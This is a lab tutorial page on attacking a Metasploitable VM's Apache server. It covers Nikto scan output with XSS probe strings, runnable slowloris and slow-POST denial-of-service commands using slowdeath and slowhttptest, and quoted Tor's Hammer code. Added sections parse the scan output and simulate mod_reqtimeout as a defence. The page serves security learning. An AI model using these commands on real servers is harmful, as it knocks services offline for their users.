From charlesreid1

Apache vulnerabilities by version: https://httpd.apache.org/security/vulnerabilities_22.html

Recon

Nikto

Nikto is a web server vulnerability scanner. It provides an excellent starting point for recon and for determining next steps. We'll use it to gather information about vulnerabilities in Metasploitable's web servers.

Basic usage of nikto: https://cirt.net/nikto2-docs/usage.html

# nikto -h 10.0.0.27

This reveals a number of web server vulnerabilities, both through Apache and through other things like PHP:

root@morpheus:~/codes/nikto# nikto -h 10.0.0.27
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.0.0.27
+ Target Hostname:    10.0.0.27
+ Target Port:        80
+ Start Time:         2016-03-27 13:07:26 (GMT-7)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) DAV/2
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.10
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ /phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>: Output from the phpinfo() function was found.
+ OSVDB-3268: /doc/: Directory indexing found.
+ OSVDB-48: /doc/: The /doc/ directory is browsable. This may be /usr/doc.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpMyAdmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ Server leaks inodes via ETags, header found with file /phpMyAdmin/ChangeLog, inode: 92462, size: 40540, mtime: Tue Dec  9 09:24:00 2008
+ OSVDB-3092: /phpMyAdmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /test/: Directory indexing found.
+ OSVDB-3092: /test/: This might be interesting...
+ /phpinfo.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: /icons/: Directory indexing found.
+ /phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>: Output from the phpinfo() function was found.
+ /phpinfo.php?cx[]=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<script>alert(foo)</script>: Output from the phpinfo() function was found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpMyAdmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpMyAdmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 8329 requests: 0 error(s) and 29 item(s) reported on remote host
+ End Time:           2016-03-27 13:08:29 (GMT-7) (63 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

The following vulnerability identified by Nikto is exploited on the Metasploitable/Apache page:

+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
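The scan output above is a flat list of "+" lines mixing run metadata, banners and findings. As an added example (not part of the original page or of Nikto itself), the Python below parses those lines into structured records (OSVDB reference, path, message) and groups them by the kind of weakness, so the scan can be turned into a remediation checklist. The sample lines are copied from the scan output above; the category rules and the parse_nikto, categorize and summarize helpers are the editor's own heuristics, not Nikto's classification.

```python
# Added example by the editor, not part of the original page or of Nikto: a
# parser for the "+ ..." finding lines Nikto prints, producing structured
# records grouped by weakness type so a scan can become a remediation list.
# The sample lines are copied from the scan output on this page; the category
# rules are the editor's own heuristics, not Nikto's classification.
import re
from collections import defaultdict
from typing import Dict, List, NamedTuple, Optional


class Finding(NamedTuple):
    osvdb: Optional[str]   # OSVDB reference if Nikto printed one
    path: Optional[str]    # URL path the finding applies to, if any
    message: str
    category: str


# "+ [OSVDB-NNN: ][/path: ]message"
_LINE = re.compile(
    r"^\+\s+(?:OSVDB-(?P<osvdb>\d+):\s+)?(?:(?P<path>/\S*?):\s+)?(?P<msg>.+)$")
# Run metadata that also starts with "+ " but is not a finding
_META = re.compile(r"^(Target |Start Time|End Time|\d+ requests:|\d+ host\(s\))")

# Heuristic categories, checked in order; the first match wins
_RULES = [
    ("server-banner", re.compile(r"^Server:")),
    ("missing-security-header", re.compile(r"header is not (present|defined|set)", re.I)),
    ("directory-listing", re.compile(r"directory indexing|is browsable", re.I)),
    ("admin-interface-exposed", re.compile(r"phpMyAdmin", re.I)),
    ("info-disclosure", re.compile(
        r"phpinfo\(\)|reveals potentially sensitive|leaks inodes|x-powered-by", re.I)),
    ("dangerous-method", re.compile(r"\bTRACE method", re.I)),
    ("outdated-software", re.compile(r"appears to be outdated", re.I)),
    ("content-negotiation", re.compile(r"MultiViews", re.I)),
]


def categorize(message: str) -> str:
    for name, pattern in _RULES:
        if pattern.search(message):
            return name
    return "other"


def parse_nikto(text: str) -> List[Finding]:
    findings: List[Finding] = []
    for raw in text.splitlines():
        m = _LINE.match(raw.strip())
        if not m or _META.match(m.group("msg")):
            continue
        osvdb, path, msg = m.group("osvdb"), m.group("path"), m.group("msg")
        findings.append(Finding(osvdb, path, msg, categorize(msg)))
    return findings


def summarize(findings: List[Finding]) -> Dict[str, List[str]]:
    """Category -> sorted unique affected paths (or the message when no path)."""
    groups: Dict[str, set] = defaultdict(set)
    for f in findings:
        groups[f.category].add(f.path or f.message)
    return {cat: sorted(items) for cat, items in groups.items()}


# Constructed sample: a subset of the Nikto lines shown on this page
SAMPLE = """\
+ Server: Apache/2.2.8 (Ubuntu) DAV/2
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.10
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /doc/: Directory indexing found.
+ OSVDB-48: /doc/: The /doc/ directory is browsable. This may be /usr/doc.
+ OSVDB-3092: /phpMyAdmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3233: /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: /icons/: Directory indexing found.
+ 8329 requests: 0 error(s) and 29 item(s) reported on remote host
"""

if __name__ == "__main__":
    for cat, items in summarize(parse_nikto(SAMPLE)).items():
        print(f"{cat}:")
        for item in items:
            print(f"    {item}")
```

Running it prints one block per category, which is a more useful shape for a fix list than Nikto's raw order: the two /doc/ lines collapse into one directory-listing entry, the three missing response headers sit together, and the phpMyAdmin and phpinfo exposures are separated from the cosmetic banner line.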

Python Attacks

This page covers some techniques for abusing the Apache server on the Metasploitable machine using Python.

SlowLoris DoS Attack

Slowloris is a script that opens a (large) fixed number of connections, sends a payload of a specified size over each one, then proceeds to twiddle its thumbs.

Slowloris is basically an HTTP Denial of Service attack that affects threaded servers.

We start making lots of HTTP requests.

We send headers periodically (every ~15 seconds) to keep the connections open.

We never close the connection unless the server does so. If the server closes a connection, we create a new one and keep doing the same thing.

This exhausts the server's thread pool, and the server can't reply to other people.

This is the computer networking equivalent of when you go to the bank, and just before you get to the teller window, a little old lady with a giant sack of pennies says "I'd like to deposit $573 in pennies. 1... 2... 3... 4... 5..." Except that here, an army of old ladies shows up in front of every teller window.

Slow Death Script

https://github.com/evert/slowdeath

This is a Python script that implements the SlowLoris attack with a fixed number of threads opening connections with the web server. This will completely swamp, e.g., an Apache server on a single machine.

slowhttptest

See the section below about slowhttptest for a nicer frontend with more options. What is covered below is some simple and straightforward Python.

Before

Here's what you should see before the attack when you punch in the IP address of the Metasploitable machine:

SlowDeath PreAttack.png

(Note that here the machine is at 192.168.56.101, a setup that corresponds to creating a host-only network adapter in VirtualBox. That means we'll be creating a network that only virtual machines on the host computer will be able to see.)

Running

To use slowdeath:

# python slowdeath.py -t 200 http://192.168.56.101

This will open 200 simultaneous connections and send data very, very slowly over those 200 connections.

During/After

This swamps the server temporarily, and anyone visiting 192.168.56.101 in the browser will experience a denial of service:

SlowDeath DOS.png

This will continue to open new connections as existing connections die:

SlowDeath Reopen.png

Once the attack is killed, everything is back to normal.

Kill Apache DoS

In 2011 a vulnerability in Apache was disclosed (CVE-2011-3192). By sending requests with a specially crafted Range header, an attacker could swamp a web server's CPU and memory and crash it, leading to a denial of service.

There is a Perl version of this code called killapache.pl here: http://www.hackersgarage.com/apache-killer-denial-of-service-flaw-in-apache-webserver.html

There is a Python version of this code here: https://github.com/MaYaSeVeN/KillApachePy

However, the version of Apache on Metasploitable (2.2.8) is too old to be vulnerable to this exploit.

R U Dead Yet (RUDY) Attack

(This attack relies on POST requests. This means the site you are attacking must have a form.)

Some background info on the RUDY attack: https://www.incapsula.com/ddos/attack-glossary/rudy-r-u-dead-yet.html

This type of DoS attack opens a few connections, and leaves them open for long periods of time. This will eventually exhaust the server's resources, although the slow speed of the attack means it "should" go undetected.

The attack starts by browsing the target website and finding forms. RUDY then sends very long POST requests, and sends the large payload one byte at a time. The server won't kill the connection.

This proof of concept code is in Python and uses BeautifulSoup to automatically search for forms: https://github.com/loganhasson/r-u-dead-yet

Tor's Hammer Slow Body Attack

Tor's Hammer (https://sourceforge.net/projects/torshammer/) is a tool that uses the slow body attack to swamp Apache servers and cause a denial of service. It does this by sending a POST request with a large declared Content-Length, then sending the body one byte at a time.

    def _send_http_post(self, pause=10):
        global stop_now

        self.socks.send("POST / HTTP/1.1\r\n"
                        "Host: %s\r\n"
                        "User-Agent: %s\r\n"
                        "Connection: keep-alive\r\n"
                        "Keep-Alive: 900\r\n"
                        "Content-Length: 10000\r\n"
                        "Content-Type: application/x-www-form-urlencoded\r\n\r\n" %
                        (self.host, random.choice(useragents)))

Notice that big Content-Length field.

Tor's Hammer then sends a little bit of data across the connection, then sleeps for a random amount of time:

        for i in range(0, 9999):
            if stop_now:
                self.running = False
                break
            p = random.choice(string.letters+string.digits)
            print term.BOL+term.UP+term.CLEAR_EOL+"Posting: %s" % p+term.NORMAL
            self.socks.send(p)
            time.sleep(random.uniform(0.1, 3))

        self.socks.close()

Tor's Hammer, in particular, provides a Python script that enables running the slow body attack through a web proxy like Tor, to provide anonymity. It also implements other disguising elements like a slew of User Agent headers.

See Metasploitable/TorsHammer
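The three slow-request patterns on this page (Slowloris keeping connections open with dribbled headers, and Tor's Hammer and RUDY dribbling a POST body against a large declared Content-Length) all rely on the same thing: the server waiting indefinitely for the rest of a request. The mitigation Apache ships for this is mod_reqtimeout's RequestReadTimeout directive (added in Apache 2.2.15 and standard in 2.4), which grants each request phase a time window that only grows as bytes actually arrive. Metasploitable's Apache 2.2.8 predates the module, which is part of why it folds so easily. The Python below is an added example by the editor, not code from the original page or from the slowdeath, Tor's Hammer or RUDY projects: it simulates that policy over a constructed event stream so you can see why normal clients survive and the slow ones get cut off. The policy values mirror header=20-40,MinRate=500 body=20-40,MinRate=500; the connection names, the event stream and the apply_policy and run_demo helpers are constructed for this example.

```python
# Added example by the editor, not code from the original page or from the
# slowdeath, Tor's Hammer or RUDY projects. It simulates the read-timeout and
# minimum-rate policy of Apache's mod_reqtimeout (RequestReadTimeout): each
# request phase (headers, then body) gets a time window, every byte received
# extends the window by 1/MinRate seconds up to a hard cap, and a connection
# that misses its deadline is closed. Policy values and traffic are constructed.
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass
class PhasePolicy:
    initial: float  # seconds granted when the phase starts ("header=20-40" -> 20)
    maximum: float  # hard cap on the phase length after extensions (-> 40)
    min_rate: int   # bytes/s; each received byte extends the deadline by 1/min_rate s


# Mirrors "RequestReadTimeout header=20-40,MinRate=500 body=20-40,MinRate=500"
POLICY = {
    "header": PhasePolicy(initial=20.0, maximum=40.0, min_rate=500),
    "body": PhasePolicy(initial=20.0, maximum=40.0, min_rate=500),
}


@dataclass
class Conn:
    phase: str = "header"   # "header" -> "body" -> closed
    phase_start: float = 0.0
    deadline: float = 0.0
    status: str = "open"    # open | ok | timeout:header | timeout:body

    def start_phase(self, phase: str, now: float) -> None:
        self.phase, self.phase_start = phase, now
        self.deadline = now + POLICY[phase].initial

    def extend(self, nbytes: int) -> None:
        pol = POLICY[self.phase]
        self.deadline = min(self.phase_start + pol.maximum,
                            self.deadline + nbytes / pol.min_rate)


# (time, connection id, kind, payload); kind is "open", "data" (payload = bytes
# received), "headers_done" (payload = declared Content-Length) or "body_done"
Event = Tuple[float, str, str, int]


def apply_policy(events: List[Event], now: float) -> Dict[str, str]:
    """Replay a time-ordered event stream; return each connection's fate."""
    conns: Dict[str, Conn] = {}
    # sorted() is stable, so events at the same instant keep their listed order
    for t, cid, kind, payload in sorted(events, key=lambda e: e[0]):
        if kind == "open":
            conns[cid] = Conn()
            conns[cid].start_phase("header", t)
            continue
        c = conns[cid]
        if c.status != "open":
            continue                    # already closed; late bytes are ignored
        if t > c.deadline:              # the phase went quiet past its deadline
            c.status = "timeout:" + c.phase
        elif kind == "data":
            c.extend(payload)
        elif kind == "headers_done":
            if payload > 0:
                c.start_phase("body", t)   # a body is declared: start the body clock
            else:
                c.status = "ok"            # request complete, e.g. a plain GET
        elif kind == "body_done":
            c.status = "ok"
    # Connections with no further events are still judged against the clock
    for c in conns.values():
        if c.status == "open" and now > c.deadline:
            c.status = "timeout:" + c.phase
    return {cid: c.status for cid, c in conns.items()}


def demo_events() -> List[Event]:
    """Constructed traffic: two normal clients and two slow-request patterns."""
    ev: List[Event] = []
    # Normal GET: headers arrive at once, no body
    ev += [(0.0, "legit-get", "open", 0), (0.05, "legit-get", "data", 300),
           (0.05, "legit-get", "headers_done", 0)]
    # Normal POST: headers, then a 5000-byte form body within a fraction of a second
    ev += [(0.0, "legit-post", "open", 0), (0.05, "legit-post", "data", 250),
           (0.05, "legit-post", "headers_done", 5000),
           (0.25, "legit-post", "data", 5000), (0.3, "legit-post", "body_done", 0)]
    # Slowloris pattern: partial headers, one more header line every 15 s, never finished
    ev += [(0.0, "slowloris", "open", 0), (0.0, "slowloris", "data", 40)]
    ev += [(15.0 * k, "slowloris", "data", 20) for k in range(1, 7)]
    # Tor's Hammer / RUDY pattern: complete headers declaring Content-Length: 10000,
    # then one body byte every 2 s
    ev += [(0.0, "slowbody", "open", 0), (0.1, "slowbody", "data", 200),
           (0.1, "slowbody", "headers_done", 10000)]
    ev += [(2.0 * k, "slowbody", "data", 1) for k in range(1, 40)]
    return ev


def run_demo() -> Dict[str, str]:
    return apply_policy(demo_events(), now=120.0)


if __name__ == "__main__":
    for cid, status in run_demo().items():
        print(f"{cid:10s} {status}")
```

Run stand-alone it prints one line per connection: both normal clients end "ok", the Slowloris connection is closed in the header phase at the 30-second mark (its 20 bytes per 15 seconds extend the window by only 0.04 s each time), and the slow-body connection is closed in the body phase because one byte every two seconds is nowhere near 500 bytes/s. On a real server the same thresholds go in the Apache configuration, and the mod_status scoreboard (many workers stuck in state R, reading request) is the quickest way to notice one of these attacks in progress.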

Command-Line Utility Attacks

slowhttptest

This one's pretty straightforward. Download and install slowhttptest:

# apt-get install slowhttptest

This comes bundled with multiple utilities for multiple types of DoS attacks:

  • Slow POST mode (sends unfinished HTTP message bodies)
  • SlowLoris mode (sends unfinished HTTP requests)
  • Range header mode (tests the killapache vulnerability, mentioned above, which Metasploitable is not vulnerable to)
  • Slow Read mode (reads HTTP responses slowly)

SlowLoris DoS Attack

To use the SlowLoris denial of service attack and open a bunch of idle connections with a web server, use the -H flag.

# slowhttptest -H -u http://10.0.0.27

The -u flag specifies the URL of the target. However, we'll want to spice it up a bit more - specify a thousand connections -c 1000, and a few other parameters -i 10 for interval between two tests, -r 200 for 200 connections per second, -t GET to make these requests GET requests (keep it simple).

The -x 24 flag sets a cap on the amount of data sent, chunk-by-chunk, to the web server. -p 3 marks the server as DoS'ed if it doesn't respond after 3 seconds.

# slowhttptest -H -c 1000 -i 10 -r 200 -t GET -x 24 -p 3 -u http://10.0.0.27

This strangles the web server. Here's what it looks like when the Metasploitable machine is under attack:

SlowLoris UnderAttack.png

and here's what it looks like once the attack has been stopped:

SlowLoris Relief.png

Slow POST Attack

Not sure how this attack works without a form on the page being attacked, but somehow, it works. The reason is that the server has to read the declared request body before it can hand the request to any handler, so a POST to any URL with an unfinished body holds a worker just as an unfinished header does; no form needs to exist.

To run the slow body attack, use the -B flag, and specify the URL target:

# slowhttptest -B -u http://10.0.0.27

Pictured below is a screenshot of the attack being run from two different machines, against the target at 10.0.0.27. With two machines attacking a single web server, there's no hope for 10.0.0.27.

Rudy UnderAttack.png

Flags